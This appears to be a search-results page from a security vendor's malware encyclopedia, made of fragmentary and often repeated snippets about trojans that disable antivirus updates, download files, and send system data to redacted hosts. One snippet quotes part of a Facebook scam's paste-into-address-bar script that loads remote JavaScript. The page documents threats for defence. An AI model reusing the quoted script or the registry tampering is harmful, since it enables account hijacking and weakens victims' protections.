Search
Keyword: URL
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
Manipulate system sound volume Open Web pages Read/Write/Delete registry values Record sounds using microphone Remove itself Send emails Start/Stop services Update itself It connects to the following URL to
voir absolument. Once an unsuspecting user clicks on the said video, it plays a YouTube video. It then triggers an automatic Like on Facebook for a malicious URL and displays the link on the wall of the
Extension} = %Application Data%\{Random File Name}.exe {Random Numbers} Other Details This Trojan displays the following message boxes: Security Tool Installed. It does the following: It connects to this URL
the malware server Market - view a package specified by the malware server in the Android Market Web - view a URL specified by the malware server 12 for 2012: What Will The New Year Bring? Steals
\Managechar.exe = %Application Data%\Managechar.exe NOTES: It connects to the following URL via HTTP GET to access other advertisement sites and possibly download other files into the system. However, during
As of this writing, the said sites are inaccessible. NOTES: This Trojan sends the following system information to the URL {BLOCKED}8.net:6032 : CPU Speed Operating System used RAM System Language 12
environment. NOTES: Download Routine This malware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals the
XP, and Server 2003.) NOTES: As of this writing, the URL where the file can be downloaded is already inaccessible and it redirects to http://www.yahoo.co.jp . As a result, the downloaded file saved as
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0) 2. Delete the actual address from the url field in your browser and paste the code instead. 3. Press Enter
TabProcGrowth = "0" HKEY_LOCAL_MACHINE\ SOFTWARE\ MICROSOFT\ Windows\ CURRENTVERSION\ URL SystemMgr = "Del" HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\ protected\AVP7\profiles\ Updater enabled = "0" Other Details
a virtual environment. NOTES: This spyware attempts to connect to the following URL to download and execute another file: http://{BLOCKED}t.com/3/1.php?q={number} If download is successful, it signals
following URL to continue the purchase: http://{BLOCKED}tion-privacy.com/buynow.php NOTES: It displays the following fake scanning window and bogus alerts on the affected system: It terminates all running
thread performing its malicious routines. It also executes the legitimate file %System%\wdmaud.drv . This Trojan may connect to the URL liyanyanzy.{BLOCKED}2.org This Trojan does not have rootkit
(Default) = "%System%\MediaP.dll" NOTES: It connects to the following URL when Internet Explorer is opened: http://www.{BLOCKED}babys.com/cgi-bin/mmlogin.cgi Trojan.Win32.BHO.bnwy (Kaspersky), W32/BHO.BNWY